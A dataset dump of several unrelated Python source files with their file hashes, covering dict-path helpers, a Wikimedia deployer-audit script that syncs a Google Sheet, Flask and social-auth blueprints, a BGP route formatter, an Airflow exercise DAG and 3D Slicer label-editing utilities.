ext
stringclasses 9
values | sha
stringlengths 40
40
| content
stringlengths 3
1.04M
|
---|---|---|
py | b40b16947bd13574540c2cdd8bc01b96d1ee0884 | """
Some basic dicts and field-in-a-dict manipulation helpers.
"""
import collections.abc
import enum
from typing import Any, Callable, Generic, Iterable, Iterator, List, \
Mapping, MutableMapping, Optional, Tuple, TypeVar, Union
FieldPath = Tuple[str, ...]
FieldSpec = Union[None, str, FieldPath, List[str]]
_T = TypeVar('_T')
_K = TypeVar('_K')
_V = TypeVar('_V')
class _UNSET(enum.Enum):
token = enum.auto()
def parse_field(
field: FieldSpec,
) -> FieldPath:
"""
Convert any field into a tuple of nested sub-fields.
Supported notations:
* ``None`` (for root of a dict).
* ``"field.subfield"``
* ``("field", "subfield")``
* ``["field", "subfield"]``
"""
if field is None:
return tuple()
elif isinstance(field, str):
return tuple(field.split('.'))
elif isinstance(field, (list, tuple)):
return tuple(field)
else:
raise ValueError(f"Field must be either a str, or a list/tuple. Got {field!r}")
def resolve(
d: Optional[Mapping[Any, Any]],
field: FieldSpec,
default: Union[_T, _UNSET] = _UNSET.token,
*,
assume_empty: bool = False,
ignore_wrong: bool = False,
) -> Union[Any, _T]:
"""
Retrieve a nested sub-field from a dict.
If ``assume_empty`` is set, then the non-existent path keys are assumed
to be empty dictionaries, and then the ``default`` is returned.
if ``ignore_wrong`` is set, then the non-dictionaries are assumed to
not exist, since we cannot dive deep into non-dictionary values.
This is used in the diff reduction.
Otherwise (by default), any attempt to get a key from ``None``
leads to a ``TypeError`` -- same as in Python: ``None['key']``.
"""
path = parse_field(field)
try:
result = d
for key in path:
if result is None and assume_empty and not isinstance(default, _UNSET):
return default
elif isinstance(result, collections.abc.Mapping):
result = result[key]
elif ignore_wrong:
result = None
else:
raise TypeError(f"The structure is not a dict with field {key!r}: {result!r}")
return result
except KeyError:
if not isinstance(default, _UNSET):
return default
raise
def ensure(
d: MutableMapping[Any, Any],
field: FieldSpec,
value: Any,
) -> None:
"""
Force-set a nested sub-field in a dict.
If some levels of parents are missing, they are created as empty dicts
(this what makes it "ensuring", not just "setting").
"""
result = d
path = parse_field(field)
if not path:
raise ValueError("Setting a root of a dict is impossible. Provide the specific fields.")
for key in path[:-1]:
try:
result = result[key]
except KeyError:
result = result.setdefault(key, {})
result[path[-1]] = value
def remove(
d: MutableMapping[Any, Any],
field: FieldSpec,
) -> None:
"""
Remove a nested sub-field from a dict, and all empty parents (optionally).
All intermediate parents that become empty after the removal are also
removed, making the whole original dict cleaner. For single-field removal,
use a built-in ``del d[key]`` operation.
If the target key is absent already, or any of the intermediate parents
is absent (which implies that the target key is also absent), no error
is raised, since the goal of deletion is achieved. The empty parents are
anyway removed.
"""
path = parse_field(field)
if not path:
raise ValueError("Removing a root of a dict is impossible. Provide a specific field.")
elif len(path) == 1:
try:
del d[path[0]]
except KeyError:
pass
else:
try:
# Recursion is the easiest way to implement it, assuming the bodies/patches are shallow.
remove(d[path[0]], path[1:])
except KeyError:
pass
else:
# Clean the parent dict if it has become empty due to deletion of the only sub-key.
# Upper parents will be handled by upper recursion functions.
if d[path[0]] == {}: # but not None, and not False, etc.
del d[path[0]]
def cherrypick(
src: Mapping[Any, Any],
dst: MutableMapping[Any, Any],
fields: Optional[Iterable[FieldSpec]],
picker: Optional[Callable[[_T], _T]] = None,
) -> None:
"""
Copy all specified fields between dicts (from src to dst).
"""
picker = picker if picker is not None else lambda x: x
fields = fields if fields is not None else []
for field in fields:
try:
ensure(dst, field, picker(resolve(src, field)))
except KeyError:
pass # absent in the source, nothing to merge
def walk(
objs: Union[_T,
Iterable[_T],
Iterable[Union[_T,
Iterable[_T]]]],
*,
nested: Optional[Iterable[FieldSpec]] = None,
) -> Iterator[_T]:
"""
Iterate over objects, flattening the lists/tuples/iterables recursively.
In plain English, the source is either an object, or a list/tuple/iterable
of objects with any level of nesting. The dicts/mappings are excluded,
despite they are iterables too, as they are treated as objects themselves.
For the output, it yields all the objects in a flat iterable suitable for::
for obj in walk(objs):
pass
The type declares only 2-level nesting, but this is done only
for type-checker's limitations. The actual nesting can be infinite.
It is highly unlikely that there will be anything deeper than one level.
"""
if objs is None:
pass
elif isinstance(objs, collections.abc.Mapping):
yield objs # type: ignore
for subfield in (nested if nested is not None else []):
try:
yield resolve(objs, parse_field(subfield))
except KeyError:
pass
elif isinstance(objs, collections.abc.Iterable):
for obj in objs:
yield from walk(obj, nested=nested)
else:
yield objs # NB: not a mapping, no nested sub-fields.
class MappingView(Generic[_K, _V], Mapping[_K, _V]):
"""
A lazy resolver for the "on-demand" dict keys.
This is needed to have :kwarg:`spec`, :kwarg:`status`, and other fields
to be *assumed* as dicts, even if they are actually not present.
And to prevent their implicit creation with ``.setdefault('spec', {})``,
which produces unwanted side-effects (actually adds this field).
>>> body = {}
>>> spec = MappingView(body, 'spec')
>>> spec.get('field', 'default')
... 'default'
>>> body['spec'] = {'field': 'value'}
>>> spec.get('field', 'default')
... 'value'
"""
_src: Mapping[_K, _V]
def __init__(self, __src: Mapping[Any, Any], __path: FieldSpec = None) -> None:
super().__init__()
self._src = __src
self._path = parse_field(__path)
def __repr__(self) -> str:
return repr(dict(self))
def __len__(self) -> int:
return len(resolve(self._src, self._path, {}, assume_empty=True))
def __iter__(self) -> Iterator[Any]:
return iter(resolve(self._src, self._path, {}, assume_empty=True))
def __getitem__(self, item: _K) -> _V:
return resolve(self._src, self._path + (item,))
class MutableMappingView(Generic[_K, _V], MappingView[_K, _V], MutableMapping[_K, _V]):
"""
A mapping view with values stored and sub-dicts auto-created.
>>> patch = {}
>>> status = MutableMappingView(patch, 'status')
>>> status.get('field', 'default')
... 'default'
>>> patch
... {}
>>> status['field'] = 'value'
>>> patch
... {'status': {'field': 'value'}}
>>> status.get('field', 'default')
... 'value'
"""
_src: MutableMapping[_K, _V] # type clarification
def __delitem__(self, item: _K) -> None:
d = resolve(self._src, self._path)
del d[item]
def __setitem__(self, item: _K, value: _V) -> None:
ensure(self._src, self._path + (item,), value)
class ReplaceableMappingView(Generic[_K, _V], MappingView[_K, _V]):
"""
A mapping view where the whole source can be replaced atomically.
All derived mapping views that use this mapping view as their source will
immediately notice the change.
The method names are intentionally long and multi-word -- to not have
potential collisions with regular expected attributes/properties.
>>> body = ReplaceableMappingView()
>>> spec = MappingView(body, 'spec')
>>> spec.get('field', 'default')
... 'default'
>>> body._replace_with({'spec': {'field': 'value'}})
>>> spec.get('field', 'default')
... 'value'
"""
def _replace_from(self, __src: MappingView[_K, _V]) -> None:
self._src = __src._src
def _replace_with(self, __src: Mapping[_K, _V]) -> None:
self._src = __src
|
py | b40b1746125d2caba5ea5bd4f8d388a7054ea4f0 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
""" Tool to audit Wikimedia deployers
Author: [email protected]
License: Apache 2.0
Uses: github.com (for raw data.yaml file), google sheets API
"""
import argparse
import datetime
import pickle
import os
import re
import requests
import sys
import urllib.parse
import yaml
from googleapiclient.discovery import build
from google_auth_oauthlib.flow import InstalledAppFlow
from google.auth.transport.requests import Request
from dotenv import load_dotenv
""" constants """
load_dotenv()
SCOPES = ['https://www.googleapis.com/auth/spreadsheets']
GET_RANGE = "Deployers Audit!A2:G"
WRITE_RANGE = "Deployers Audit!A2"
ADMIN_DATA_FILE = os.getenv('DTG_ADMIN_DATA_FILE')
SPREADSHEET_ID = os.getenv('DTG_GOOGLE_SHEET_ID')
SAL_URL_BASE = os.getenv('DTG_SAL_URL_BASE')
SAL_YEARS_PREV = os.getenv('DTG_SAL_YEARS_PREV')
NO_DEPLOYS = 'No deploys last 2 years'
def main():
""" cli args/control """
parser = argparse.ArgumentParser()
parser.add_argument('-p', '--phab', action='store_true',
default=False,
help='Optionally print Phab-formatted\
table to stdout')
parser.add_argument('-n', '--nodeploys', action='store_true',
default=False,
help='Only print "no deploy" users for\
Phab-formatted table')
args, unknown = parser.parse_known_args()
""" process Google Sheets API creds """
creds = None
if os.path.exists('token.pickle'):
with open('token.pickle', 'rb') as token:
creds = pickle.load(token)
""" If there are no (valid) credentials available, let the user log in. """
if not creds or not creds.valid:
if creds and creds.expired and creds.refresh_token:
creds.refresh(Request())
else:
flow = InstalledAppFlow.from_client_secrets_file(
'credentials.json', SCOPES)
creds = flow.run_local_server(port=0)
""" Save the credentials for the next run """
with open('token.pickle', 'wb') as token:
pickle.dump(creds, token)
service = build('sheets', 'v4', credentials=creds)
""" get and process admin.yaml """
resp = requests.get(ADMIN_DATA_FILE)
if resp.status_code != 200:
print("Response Error, status code = {}".format(resp.status_code))
sys.exit(1)
else:
deployers_from_yaml = []
data = yaml.safe_load(resp.text)
if isinstance(data, dict):
deployers_from_yaml = data['groups']['deployment']['members']
deployers_from_yaml.sort()
""" try to find last deployed data for a deployer
wikitech:index.php?title=Server_admin_log/Archives&action=raw
wikitech:index.php?title=Server_admin_log&action=raw
search back dates for user - pattern: 'nn:nn {user}:' """
full_log_text = ''
deployers_last_deploy = {}
""" current last deploy data from sal """
current_url = ''.join([SAL_URL_BASE, 'Server%20Admin%20Log&action=raw'])
resp = requests.get(current_url)
if resp.status_code != 200:
print("Response Error, status code = {}".format(resp.status_code))
sys.exit(1)
else:
full_log_text = ''.join([full_log_text, resp.text])
""" historic last deploy data from sal """
historic_url = ''.join([SAL_URL_BASE,
'Server_admin_log/Archives&action=raw'])
resp = requests.get(historic_url)
if resp.status_code != 200:
print("Response Error, status code = {}".format(resp.status_code))
sys.exit(1)
else:
years = [datetime.datetime.now().year,
datetime.datetime.now().year - int(SAL_YEARS_PREV)]
for year in years:
for line in resp.text.split('\n'):
pat = ''.join([r'\[\[(.+)\|', str(year), r'.+'])
found = re.findall(pat, line)
if found:
for archive in found:
archive_url = ''.join([SAL_URL_BASE,
urllib.parse.quote(archive),
'&action=raw'])
aresp = requests.get(archive_url)
if aresp.status_code != 200:
print("Response Error, status code = {}".format(
resp.status_code))
sys.exit(1)
else:
full_log_text = ''.join([full_log_text,
aresp.text])
""" process last deploy data """
for dep in deployers_from_yaml:
for line in full_log_text.split('\n'):
pat_date = r'==\s*(\d{4}\-\d{2}\-\d{2})\s*=='
found_date = re.match(pat_date, line)
if 'current_last_deploy_date' not in locals():
current_last_deploy_date = NO_DEPLOYS
if found_date and len(found_date.groups(0)) > 0:
current_last_deploy_date = found_date.groups(0)[0]
continue
pat_dep = ''.join([r'(\*\s?\d\d\:\d\d\s+)(', str(dep), r')'])
if re.search(pat_dep, line, re.I):
if ((dep in deployers_last_deploy and
deployers_last_deploy[dep] <
current_last_deploy_date) or
dep not in deployers_last_deploy):
deployers_last_deploy[dep] = current_last_deploy_date
continue
if dep not in deployers_last_deploy:
deployers_last_deploy[dep] = NO_DEPLOYS
""" get current data from Google Sheet """
sheet = service.spreadsheets()
result = sheet.values().get(spreadsheetId=SPREADSHEET_ID,
range=GET_RANGE).execute()
deployers_from_sheet_data = result.get('values', [])
""" update and sync all data thus far """
deployers_all = []
deployers_from_sheet = []
deployers_to_write_to_sheet = []
for dep in deployers_from_sheet_data:
if(isinstance(dep, list) and len(dep) > 0 and isinstance(dep[0], str)):
deployers_from_sheet.append(dep[0])
deployers_all = list(set().union(
deployers_from_sheet,
deployers_from_yaml)
)
deployers_all.sort()
update_time = datetime.datetime.utcnow().strftime('%Y-%m-%d %H:%M')
for dep in deployers_all:
if(len(deployers_from_sheet_data) > 0):
dep_found = False
dep_last_deploy = deployers_last_deploy[dep] if\
dep in deployers_last_deploy else NO_DEPLOYS
for dep_data in deployers_from_sheet_data:
if(isinstance(dep_data, list) and
isinstance(dep, str) and
dep == dep_data[0]):
if len(dep_data) == 1:
dep_data.append("")
if len(dep_data) == 2:
dep_data.append("0")
if len(dep_data) == 3:
dep_data.append("0")
if len(dep_data) == 4:
dep_data.append("0")
if len(dep_data) == 5:
dep_data.append("")
elif(len(dep_data[5]) == 0 or
dep_data[5] != dep_last_deploy):
dep_data[5] = dep_last_deploy
if len(dep_data) == 6:
dep_data.append(update_time)
else:
dep_data[6] = update_time
dep_data.pop(0)
deployers_to_write_to_sheet.append([dep] + dep_data)
dep_found = True
if(dep_found is False):
deployers_to_write_to_sheet.append(
[dep, "", "0", "0", "0", dep_last_deploy, update_time])
""" write updated data to Google Sheet """
result2 = sheet.values().update(
spreadsheetId=SPREADSHEET_ID,
range=WRITE_RANGE,
body={"range": WRITE_RANGE,
"values": deployers_to_write_to_sheet,
"majorDimension": "ROWS"},
valueInputOption="RAW").execute()
print('Google sheet has been updated.')
""" optionally format output as Phab table """
if(args.phab):
print('\n| Shell username | Name | WMF | WMDE | \
WMF Legal NDA? | Last Deployed | Date Updated')
print('| --- | --- | --- | --- | --- | --- | ---')
for row in deployers_to_write_to_sheet:
if(args.nodeploys and row[5] == NO_DEPLOYS):
print('|', ' | '.join(row))
elif(not args.nodeploys):
print('|', ' | '.join(row))
""" call main """
if __name__ == '__main__':
main()
|
py | b40b17683d0192461c655c5db06f9997666b3374 | import flask
import os
import sys
folder = os.path.abspath(os.path.join(os.path.dirname(__file__), '..'))
sys.path.insert(0, folder)
app = flask.Flask(__name__)
def main():
register_blueprints()
print(os.getcwd())
app.run(debug=True)
# def register_blueprints():
# from views import home_views
# app.register_blueprint(home_views.blueprint)
def register_blueprints():
from badgettingbetter.views import post_views
from badgettingbetter.views import home_views
app.register_blueprint(home_views.blueprint)
app.register_blueprint(post_views.blueprint)
if __name__=="__main__":
main() |
py | b40b1994bfca4ea03ba6eef520956c1e9d85cfae | import StringIO
class RouteFormatterMixin(object):
fmtstr = ' {0:<3s} {1:<32s} {2:<8s} {3:<20s} {4:<15s} '\
'{5:<6s} {6:<6s} {7:<}\n'
@classmethod
def _format_family_header(cls):
ret = ''
ret += ('Status codes: * valid, > best\n')
ret += ('Origin codes: i - IGP, e - EGP, ? - incomplete\n')
ret += cls.fmtstr.format('', 'Network', 'Labels', 'Next Hop', 'Reason',
'Metric', 'LocPrf', 'Path')
return ret
@classmethod
def _format_family(cls, dest_list):
msg = StringIO.StringIO()
def _append_path_info(buff, path, is_best, show_prefix):
aspath = path.get('aspath')
origin = path.get('origin')
if origin:
aspath.append(origin)
bpr = path.get('bpr')
next_hop = path.get('nexthop')
med = path.get('metric')
labels = path.get('labels')
localpref = path.get('localpref')
# Construct path status string.
path_status = '*'
if is_best:
path_status += '>'
# Check if we want to show prefix.
prefix = ''
if show_prefix:
prefix = path.get('prefix')
# Append path info to String buffer.
buff.write(cls.fmtstr.format(path_status, prefix, labels,
next_hop, bpr, str(med),
str(localpref),
' '.join(map(str, aspath))))
for dist in dest_list:
for idx, path in enumerate(dist.get('paths')):
_append_path_info(msg, path, path['best'], (idx == 0))
ret = msg.getvalue()
msg.close()
return ret
|
py | b40b1b14f4677e601b26b5925a3cedc862a9659b | import logging
from flask import Blueprint, request, after_this_request, redirect, current_app, jsonify, url_for, g
from flask_login import current_user, login_required
from flask_security import login_user
from flask_security.decorators import anonymous_user_required
from flask_security.utils import config_value
from social_core.actions import do_complete, do_auth, do_disconnect
from social_flask.utils import psa
from werkzeug.local import LocalProxy
bp_auth = Blueprint('auth', __name__, url_prefix='/auth')
security = LocalProxy(lambda: current_app.extensions['security'])
datastore = LocalProxy(lambda: security.datastore)
def do_login(backend, user, social_user):
name = backend.strategy.setting('REMEMBER_SESSION_NAME', 'keep')
remember = backend.strategy.session_get(name) or \
request.cookies.get(name) or \
request.args.get(name) or \
request.form.get(name) or \
False
security.datastore.add_role_to_user(user, 'user')
security.datastore.remove_role_from_user(user, 'anonymous')
return login_user(user, remember=remember)
def _commit(response=None):
datastore.commit()
return response
def _ctx(endpoint):
return security._run_ctx_processor(endpoint)
@bp_auth.route('/login', methods=['GET'])
@bp_auth.route('/login/<string:backend>/', methods=('GET', 'POST'))
@anonymous_user_required
@psa('auth.complete')
def login(backend):
return do_auth(g.backend)
@bp_auth.route('/complete/<string:backend>/', methods=('GET', 'POST'))
@psa('auth.complete')
def complete(backend, *args, **kwargs):
return do_complete(g.backend, login=do_login, user=current_user, *args, **kwargs)
@bp_auth.route('/disconnect/<string:backend>/', methods=('POST',))
@bp_auth.route('/disconnect/<string:backend>/<int:association_id>/', methods=('POST',))
@bp_auth.route('/disconnect/<string:backend>/<string:association_id>/', methods=('POST',))
@login_required
@psa()
def disconnect(backend, association_id=None):
return do_disconnect(g.backend, g.user, association_id)
@bp_auth.route('/admin-login', methods=['GET', 'POST'], endpoint='admin_login')
@anonymous_user_required
def admin_login():
form_class = security.login_form
form = form_class(request.form)
if form.validate_on_submit():
login_user(form.user, remember=form.remember.data)
after_this_request(_commit)
return redirect(form.next.data or url_for('admin.index'))
return security.render_template(
config_value('LOGIN_USER_TEMPLATE'), login_user_form=form, **_ctx('login'))
|
py | b40b1bf07173aca6219311a322fa7fd10790ded9 | import datetime
import logging
from airflow import DAG
from airflow.operators.python_operator import PythonOperator
def hello_world():
logging.info("Hello World")
def addition():
logging.info(f"2 + 2 = {2+2}")
def subtraction():
logging.info(f"6 -2 = {6-2}")
def division():
logging.info(f"10 / 2 = {int(10/2)}")
dag = DAG(
"lesson1.exercise3",
schedule_interval='@hourly',
start_date=datetime.datetime.now() - datetime.timedelta(days=1))
hello_world_task = PythonOperator(
task_id="hello_world",
python_callable=hello_world,
dag=dag)
#
# TODO: Define an addition task that calls the `addition` function above
#
addition_task = PythonOperator(
task_id="addition",
python_callable=addition,
dag=dag)
#
# TODO: Define a subtraction task that calls the `subtraction` function above
#
subtraction_task = PythonOperator(
task_id="subtraction",
python_callable=subtraction,
dag=dag)
#
# TODO: Define a division task that calls the `division` function above
#
division_task = PythonOperator(
task_id="division",
python_callable=division,
dag=dag)
#
# TODO: Configure the task dependencies such that the graph looks like the following:
#
# -> addition_task
# / \
# hello_world_task -> division_task
# \ /
# ->subtraction_task
hello_world_task >> addition_task
hello_world_task >> subtraction_task
addition_task >> division_task
subtraction_task >> division_task |
py | b40b1c463d1402f46a4ef81add7869867d8b7539 | import vtk
import slicer
import logging
from slicer.util import NodeModify
__all__ = ['EditUtil']
#########################################################
#
#
comment = """
EditUtil holds utility functions required by the other
editor classes
Note: this needs to be a class so it can be reloaded
# TODO :
"""
#
#########################################################
class EditUtil(object):
@staticmethod
def getParameterNode():
"""Get the Editor parameter node - a singleton in the scene"""
node = EditUtil._findParameterNodeInScene()
if not node:
node = EditUtil._createParameterNode()
return node
@staticmethod
def _findParameterNodeInScene():
node = None
size = slicer.mrmlScene.GetNumberOfNodesByClass("vtkMRMLScriptedModuleNode")
for i in range(size):
n = slicer.mrmlScene.GetNthNodeByClass( i, "vtkMRMLScriptedModuleNode" )
if n.GetModuleName() == "Editor" and n.GetSingletonTag() == "Editor":
node = n
return node
@staticmethod
def _createParameterNode():
"""create the Editor parameter node - a singleton in the scene
This is used internally by getParameterNode - shouldn't really
be called for any other reason.
"""
node = slicer.vtkMRMLScriptedModuleNode()
node.SetSingletonTag( "Editor" )
node.SetModuleName( "Editor" )
node.SetParameter( "label", "1" )
node.SetParameter( "effect", "DefaultTool" )
node.SetParameter( "propagationMode", str(slicer.vtkMRMLApplicationLogic.BackgroundLayer | slicer.vtkMRMLApplicationLogic.LabelLayer) )
slicer.mrmlScene.AddNode(node)
# Since we are a singleton, the scene won't add our node into the scene,
# but will instead insert a copy, so we find that and return it
node = EditUtil._findParameterNodeInScene()
return node
@staticmethod
def getCurrentEffect():
"""return effect associated with the editor parameter node.
"""
return EditUtil.getParameterNode().GetParameter('effect')
@staticmethod
def setCurrentEffect(name):
"""set current effect on the editor parameter node.
"""
if name != 'EraseLabel':
EditUtil.getParameterNode().SetParameter('effect', name)
else:
EditUtil.toggleLabel()
@staticmethod
def getCompositeNode(layoutName='Red'):
""" use the Red slice composite node to define the active volumes """
count = slicer.mrmlScene.GetNumberOfNodesByClass('vtkMRMLSliceCompositeNode')
for n in range(count):
compNode = slicer.mrmlScene.GetNthNodeByClass(n, 'vtkMRMLSliceCompositeNode')
if compNode.GetLayoutName() == layoutName:
return compNode
@staticmethod
def getSliceWidget(layoutName='Red'):
""" use the Red slice widget as the default"""
layoutManager = slicer.app.layoutManager()
sliceWidget = layoutManager.sliceWidget(layoutName)
return sliceWidget
@staticmethod
def getSliceLogic(layoutName='Red'):
""" use the Red slice logic as the default for operations that are
not specific to a slice widget"""
sliceWidget = EditUtil.getSliceWidget(layoutName)
return sliceWidget.sliceLogic()
@staticmethod
def getBackgroundImage():
backgroundVolume = EditUtil.getBackgroundVolume()
if backgroundVolume:
return backgroundVolume.GetImageData()
@staticmethod
def getBackgroundVolume():
compNode = EditUtil.getCompositeNode()
if compNode:
backgroundID = compNode.GetBackgroundVolumeID()
if backgroundID:
return slicer.mrmlScene.GetNodeByID(backgroundID)
@staticmethod
def getBackgroundID():
compNode = EditUtil.getCompositeNode()
if compNode:
return compNode.GetBackgroundVolumeID()
@staticmethod
def getLabelImage():
labelVolume = EditUtil.getLabelVolume()
if labelVolume:
return labelVolume.GetImageData()
@staticmethod
def getLabelID():
compNode = EditUtil.getCompositeNode()
if compNode:
return compNode.GetLabelVolumeID()
@staticmethod
def getLabelVolume():
compNode = EditUtil.getCompositeNode()
if compNode:
labelID = compNode.GetLabelVolumeID()
if labelID:
return slicer.mrmlScene.GetNodeByID(labelID)
@staticmethod
def getColorNode():
if not EditUtil.isEraseEffectEnabled():
EditUtil.backupLabel()
labelNode = EditUtil.getLabelVolume()
if labelNode:
dispNode = labelNode.GetDisplayNode()
if dispNode:
return ( dispNode.GetColorNode() )
@staticmethod
def getLabel():
return int(EditUtil.getParameterNode().GetParameter('label'))
@staticmethod
def setLabel(label):
EditUtil.getParameterNode().SetParameter('label',str(label))
@staticmethod
def getPropagationMode():
defaultPropagationMode = slicer.vtkMRMLApplicationLogic.BackgroundLayer | slicer.vtkMRMLApplicationLogic.LabelLayer
propagationMode = defaultPropagationMode
propagationModeString = EditUtil.getParameterNode().GetParameter('propagationMode')
try:
propagationMode = int(propagationModeString)
except ValueError:
propagationMode = defaultPropagationMode
EditUtil.setPropagateMode(defaultPropagationMode)
return propagationMode
@staticmethod
def setPropagateMode(propagationMode):
EditUtil.getParameterNode().SetParameter('propagationMode',str(propagationMode))
@staticmethod
def setActiveVolumes(masterVolume, mergeVolume=None):
"""make the master node the active background, and the merge node the active label
"""
if isinstance(masterVolume, str):
masterVolume = slicer.mrmlScene.GetNodeByID(masterVolume)
if isinstance(mergeVolume, str):
mergeVolume = slicer.mrmlScene.GetNodeByID(mergeVolume)
selectionNode = slicer.app.applicationLogic().GetSelectionNode()
selectionNode.SetActiveVolumeID(masterVolume.GetID())
if mergeVolume:
selectionNode.SetActiveLabelVolumeID(mergeVolume.GetID())
EditUtil.propagateVolumeSelection()
@staticmethod
def propagateVolumeSelection():
mode = EditUtil.getPropagationMode()
applicationLogic = slicer.app.applicationLogic()
applicationLogic.PropagateVolumeSelection(mode, 0)
@staticmethod
def backupLabel():
"""Save current label into 'storedLabel' parameter node attribute"""
EditUtil.getParameterNode().SetParameter('storedLabel',str(EditUtil.getLabel()))
@staticmethod
def restoreLabel():
"""Restore the label saved as 'storedLabel' parameter node attribute"""
storedLabel = EditUtil.getParameterNode().GetParameter('storedLabel')
if storedLabel:
EditUtil.setLabel(storedLabel)
@staticmethod
def toggleLabel():
"""toggle the current label map in the editor parameter node"""
if EditUtil.isEraseEffectEnabled():
EditUtil.restoreLabel()
else:
EditUtil.backupLabel()
EditUtil.setLabel(0)
@staticmethod
def isEraseEffectEnabled():
if slicer.mrmlScene.IsBatchProcessing():
return False
return EditUtil.getLabel() == 0;
@staticmethod
def setEraseEffectEnabled(enabled):
with NodeModify(EditUtil.getParameterNode()):
if enabled and not EditUtil.isEraseEffectEnabled():
EditUtil.backupLabel()
EditUtil.setLabel(0)
elif not enabled and EditUtil.isEraseEffectEnabled():
EditUtil.restoreLabel()
@staticmethod
def getLabelColor():
"""returns rgba tuple for the current paint color """
labelVolume = EditUtil.getLabelVolume()
if labelVolume:
volumeDisplayNode = labelVolume.GetDisplayNode()
if volumeDisplayNode != '':
colorNode = volumeDisplayNode.GetColorNode()
lut = colorNode.GetLookupTable()
index = EditUtil.getLabel()
return lut.GetTableValue(index)
return (0,0,0,0)
@staticmethod
def getLabelName():
"""returns the string name of the currently selected index """
labelVolume = EditUtil.getLabelVolume()
if labelVolume:
volumeDisplayNode = labelVolume.GetDisplayNode()
if volumeDisplayNode != '':
colorNode = volumeDisplayNode.GetColorNode()
index = EditUtil.getLabel()
return colorNode.GetColorName(index)
return ""
@staticmethod
def toggleCrosshair():
"""Turn on or off the crosshair and enable navigation mode
by manipulating the scene's singleton crosshair node.
"""
crosshairNode = slicer.mrmlScene.GetFirstNodeByClass('vtkMRMLCrosshairNode')
if crosshairNode:
if crosshairNode.GetCrosshairMode() == 0:
crosshairNode.SetCrosshairMode(1)
else:
crosshairNode.SetCrosshairMode(0)
@staticmethod
def toggleLabelOutline():
"""Switch the label outline mode for all composite nodes in the scene"""
for sliceNode in slicer.util.getNodes('vtkMRMLSliceNode*').values():
sliceNode.SetUseLabelOutline(not sliceNode.GetUseLabelOutline())
@staticmethod
def setLabelOutline(state):
"""Set the label outline mode for all composite nodes in the scene to state"""
for sliceNode in slicer.util.getNodes('vtkMRMLSliceNode*').values():
sliceNode.SetUseLabelOutline(state)
@staticmethod
def toggleForegroundBackground():
"""Swap the foreground and background volumes for all composite nodes in the scene"""
for sliceCompositeNode in slicer.util.getNodes('vtkMRMLSliceCompositeNode*').values():
oldForeground = sliceCompositeNode.GetForegroundVolumeID()
sliceCompositeNode.SetForegroundVolumeID(sliceCompositeNode.GetBackgroundVolumeID())
sliceCompositeNode.SetBackgroundVolumeID(oldForeground)
@staticmethod
def markVolumeNodeAsModified(volumeNode):
"""Mark all parts of a volume node as modified so that a correct
render is triggered. This includes setting the modified flag on the
point data scalars so that the GetScalarRange method will return the
correct value, and certain operations like volume rendering will
know to update.
http://na-mic.org/Bug/view.php?id=3076
This method should be called any time the image data has been changed
via an editing operation.
Note that this call will typically schedule a render operation to be
performed the next time the event loop is idle.
"""
if volumeNode.GetImageDataConnection():
volumeNode.GetImageDataConnection().GetProducer().Update()
if volumeNode.GetImageData().GetPointData().GetScalars() is not None:
volumeNode.GetImageData().GetPointData().GetScalars().Modified()
volumeNode.GetImageData().Modified()
volumeNode.Modified()
@staticmethod
def structureVolume(masterNode, structureName, mergeVolumePostfix="-label"):
"""Return the per-structure volume associated with the master node for the given
structure name"""
masterName = masterNode.GetName()
structureVolumeName = masterName+"-%s"%structureName + mergeVolumePostfix
return slicer.util.getFirstNodeByName(structureVolumeName, className=masterNode.GetClassName())
@staticmethod
def addStructure(masterNode, mergeNode, structureLabel, mergeVolumePostfix="-label"):
"""Make a new per-structure volume for the given label associated with the given master
and merge nodes"""
colorNode = mergeNode.GetDisplayNode().GetColorNode()
structureName = colorNode.GetColorName( structureLabel )
structureName = masterNode.GetName()+"-%s"%structureName+mergeVolumePostfix
if EditUtil.structureVolume(masterNode, structureName, mergeVolumePostfix) is None:
volumesLogic = slicer.modules.volumes.logic()
struct = volumesLogic.CreateAndAddLabelVolume( slicer.mrmlScene, masterNode, structureName )
struct.SetName(structureName)
struct.GetDisplayNode().SetAndObserveColorNodeID( colorNode.GetID() )
@staticmethod
def splitPerStructureVolumes(masterNode, mergeNode):
"""Make a separate label map node for each non-empty label value in the
merged label map"""
colorNode = mergeNode.GetDisplayNode().GetColorNode()
accum = vtk.vtkImageAccumulate()
accum.SetInputConnection(mergeNode.GetImageDataConnection())
accum.Update()
lo = int(accum.GetMin()[0])
hi = int(accum.GetMax()[0])
thresholder = vtk.vtkImageThreshold()
for index in range(lo,hi+1):
logging.info( "Splitting label %d..."%index )
thresholder.SetInputConnection( mergeNode.GetImageDataConnection() )
thresholder.SetInValue( index )
thresholder.SetOutValue( 0 )
thresholder.ReplaceInOn()
thresholder.ReplaceOutOn()
thresholder.ThresholdBetween( index, index )
thresholder.SetOutputScalarType( mergeNode.GetImageData().GetScalarType() )
thresholder.Update()
if thresholder.GetOutput().GetScalarRange() != (0.0, 0.0):
structureName = colorNode.GetColorName(index)
logging.info( "Creating structure volume %s..."%structureName )
structureVolume = EditUtil.structureVolume( masterNode, structureName )
if not structureVolume:
EditUtil.addStructure( masterNode, mergeNode, index )
structureVolume = EditUtil.structureVolume( masterNode, structureName )
structureVolume.GetImageData().DeepCopy( thresholder.GetOutput() )
EditUtil.markVolumeNodeAsModified(structureVolume)
class UndoRedo(object):
""" Code to manage a list of undo/redo volumes
stored in a compressed format using the vtkImageStash
class to compress label maps in a thread
"""
class checkPoint(object):
"""Internal class to store one checkpoint
step consisting of the stashed data
and the volumeNode it corresponds to
"""
def __init__(self,volumeNode):
self.volumeNode = volumeNode
self.stashImage = vtk.vtkImageData()
self.stash = slicer.vtkImageStash()
self.stashImage.DeepCopy( volumeNode.GetImageData() )
self.stash.SetStashImage( self.stashImage )
self.stash.ThreadedStash()
def restore(self):
"""Unstash the volume but first check that the
stash operation is not still ongoing in the other thread.
TODO: the stash operation is determinisitic, so there's
no chance of a deadlock here, but it would still be better
to integrate the wait into the event queue to avoid locking
the interface. In practice this would only happen if the user
clicks Undo while the thread is still executing, which is
unlikely. And at worst this busy loop will consume two threads
(this one and the stashing one) for the time the stash takes to complete.
"""
while self.stash.GetStashing():
pass
self.stash.Unstash()
self.volumeNode.GetImageData().DeepCopy( self.stashImage )
EditUtil().markVolumeNodeAsModified(self.volumeNode)
def __init__(self,undoSize=100):
self.enabled = True
self.undoSize = undoSize
self.undoList = []
self.redoList = []
self.undoObservers = []
self.redoObservers = []
self.stateChangedCallback = self.defaultStateChangedCallback
def defaultStateChangedCallback(self):
"""placeholder so that using class can define a callable
for when the state of the stacks changes (e.g. for updating the
enable state of menu items or buttons"""
